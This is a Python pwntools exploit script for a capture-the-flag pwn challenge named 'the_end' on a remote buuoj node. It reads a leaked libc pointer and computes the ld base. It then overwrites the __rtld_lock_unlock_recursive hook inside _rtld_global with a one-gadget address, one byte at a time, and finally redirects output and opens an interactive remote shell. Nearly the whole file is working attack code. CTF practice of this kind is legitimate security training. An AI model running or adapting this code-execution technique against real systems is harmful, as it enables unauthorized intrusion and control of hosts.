from
pwn
import
*
from
LibcSearcher
import
*
# Short-hand wrappers around the global tube `io`, which exp() binds before
# any of these are called. Names follow the usual pwntools script
# abbreviations; each simply forwards to the matching tube method.
def s(buf):
    """Send *buf* as-is."""
    return io.send(buf)


def sl(buf):
    """Send *buf* followed by a newline."""
    return io.sendline(buf)


def sa(delim, buf):
    """Wait for *delim*, then send *buf*."""
    return io.sendafter(delim, buf)


def sal(delim, buf):
    """Wait for *delim*, then send *buf* followed by a newline."""
    return io.sendlineafter(delim, buf)


def shell():
    """Hand the tube over to the user (interactive mode)."""
    return io.interactive()


def r(n=None):
    """Receive up to *n* bytes (None leaves the size to pwntools' default)."""
    return io.recv(n)


def ra(t=tube.forever):
    """Receive everything until EOF, waiting up to *t* (default: forever)."""
    return io.recvall(t)


def ru(delim):
    """Receive up to and including *delim*."""
    return io.recvuntil(delim)


def rl():
    """Receive one line."""
    return io.recvline()


def rls(n=2 ** 20):
    """Receive up to *n* lines."""
    return io.recvlines(n)
# The libc build the hard-coded offsets in exp() assume, and the challenge
# binary. Both are parsed once here so their symbol tables are available.
libc_path = "/lib/x86_64-linux-gnu/libc-2.27.so"
elf_path = "./the_end"
libc, elf = ELF(libc_path), ELF(elf_path)
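# Select the pwntools log level from the first command-line argument
# ('1' = debug, '0' = info). `sys` is expected to come from the pwn
# star-import above. Running the script with no argument used to die with
# IndexError before anything else happened; it now falls back to info mode.
# Any other value still leaves context() untouched, as before.
_LOG_LEVELS = {'1': 'debug', '0': 'info'}
_mode = sys.argv[1] if len(sys.argv) > 1 else '0'
if _mode in _LOG_LEVELS:
    context(log_level=_LOG_LEVELS[_mode], terminal='/bin/zsh', arch='amd64', os='linux')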
# Menu prompt strings used by the add/free/show/edit stubs below. They are
# left empty in this template and are not filled in by exp().
cho = siz = con = ind = edi = ''
def add(size, content='\n', c='1\n'):
    """Menu stub: send the choice *c* once the prompt *cho* appears.

    *size* and *content* are accepted but never used; this is template
    scaffolding and exp() does not call it.
    NOTE(review): the default literals were reconstructed from a mangled
    listing -- confirm against the original file.
    """
    sal(cho, c)
def free(index, c=''):
    """Menu stub: send the choice *c* once the prompt *cho* appears.

    *index* is accepted but never used; this is template scaffolding and
    exp() does not call it.
    """
    sal(cho, c)
def show(index, c=''):
    """Menu stub: send the choice *c* once the prompt *cho* appears.

    *index* is accepted but never used; this is template scaffolding and
    exp() does not call it.
    """
    sal(cho, c)
def edit(index, content='\n', c='\n'):
    """Menu stub: send the choice *c* once the prompt *cho* appears.

    *index* and *content* are accepted but never used; this is template
    scaffolding and exp() does not call it.
    NOTE(review): the default literals were reconstructed from a mangled
    listing -- confirm against the original file.
    """
    sal(cho, c)
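def get_proc_base(p):
    """Log and return the load address of the target binary inside *p*.

    The lookup key into ``p.libs()`` is rebuilt from the process working
    directory plus ``argv[0]`` with leading/trailing dots stripped, so
    ``"./the_end"`` becomes ``"<cwd>/the_end"``. ``p._cwd`` is an
    underscore-prefixed pwntools attribute, so this may break across
    pwntools versions.

    Args:
        p: a pwntools process tube exposing ``libs()``, ``_cwd`` and ``argv``.

    Returns:
        The base address as an int. The original only logged it; returning
        it lets callers use the value without re-parsing the log.

    Raises:
        KeyError: if the rebuilt path is not among the mapped objects.
    """
    proc_base = p.libs()[p._cwd + p.argv[0].strip('.')]
    info(hex(proc_base))
    return proc_base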
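def get_libc_base(p):
    """Log and return the load address of ``libc_path`` inside *p*.

    Args:
        p: a pwntools process tube exposing ``libs()``.

    Returns:
        The libc base address as an int. The original only logged it;
        returning it lets callers use the value directly.

    Raises:
        KeyError: if ``libc_path`` is not among the objects mapped in *p*
        (e.g. the process loaded a different libc than the one configured).
    """
    libc_base = p.libs()[libc_path]
    info(hex(libc_base))
    return libc_base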
def exp():
    """Drive one session against the remote challenge instance (I/O only).

    Every numeric offset below is hard-coded for the libc-2.27 / ld-2.27
    build named in ``libc_path`` and the ld path used here; on any other
    build the arithmetic is simply wrong and the writes land elsewhere.
    Binds the module-global ``io`` that the s/sl/ru/... helpers use.
    """
    global io
    io = remote("node3.buuoj.cn", 29679)
    # The service prints a pointer right after this banner. Exactly
    # len("0x7f7819bef2b0") == 14 characters are consumed, so a leak in a
    # different format (shorter address, missing "0x") breaks the parse.
    ru("here is a gift ")
    libc.address = int(r(len("0x7f7819bef2b0")), 16) - libc.sym['sleep']
    ld = ELF('/lib/x86_64-linux-gnu/ld-2.27.so')
    # Fixed libc -> ld distance; only valid for this exact library pair.
    ld.address = libc.address + 0x3f1000
    success("libc:" + hex(libc.address))
    success("ld:" + hex(ld.address))
    # Address inside libc at a fixed offset; this is the 5-byte value written
    # below, one byte per write (only the low 40 bits are ever sent).
    ogg = libc.address + 0x4f322
    info("ogg:" + hex(ogg))
    _rtld_global = ld.sym['_rtld_global']
    success("_rtld_global:" + hex(_rtld_global))
    # Write target: a fixed offset into _rtld_global. The variable name
    # records the field the author expects at that offset --
    # NOTE(review): confirm against this ld build's struct layout.
    __rtld_lock_unlock_recursive = _rtld_global + 0xf08
    success("__rtld_lock_unlock_recursive :" + hex(__rtld_lock_unlock_recursive))
    pause()
    # Five (address, byte) pairs, low byte first: each 8-byte address is
    # followed by the matching byte of ogg, then the byte is logged.
    # The order is the remote's protocol, so the statements must not be
    # reordered.
    s(p64(__rtld_lock_unlock_recursive))
    s(p8(ogg & 0xff))
    info(hex(ogg & 0xff))
    s(p64(__rtld_lock_unlock_recursive + 1))
    s(p8((ogg >> 8) & 0xff))
    info(hex((ogg >> 8) & 0xff))
    s(p64(__rtld_lock_unlock_recursive + 2))
    s(p8((ogg >> 16) & 0xff))
    info(hex((ogg >> 16) & 0xff))
    s(p64(__rtld_lock_unlock_recursive + 3))
    s(p8((ogg >> 24) & 0xff))
    info(hex((ogg >> 24) & 0xff))
    s(p64(__rtld_lock_unlock_recursive + 4))
    s(p8((ogg >> 32) & 0xff))
    info(hex((ogg >> 32) & 0xff))
    # Sent verbatim as one line to the remote, then the tube is handed to
    # the user.
    sl('exec 1>&0')
    shell()
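# Only start the session when run as a script; importing the module (e.g. to
# reuse the helpers) must not open a connection as a side effect.
if __name__ == "__main__":
    exp()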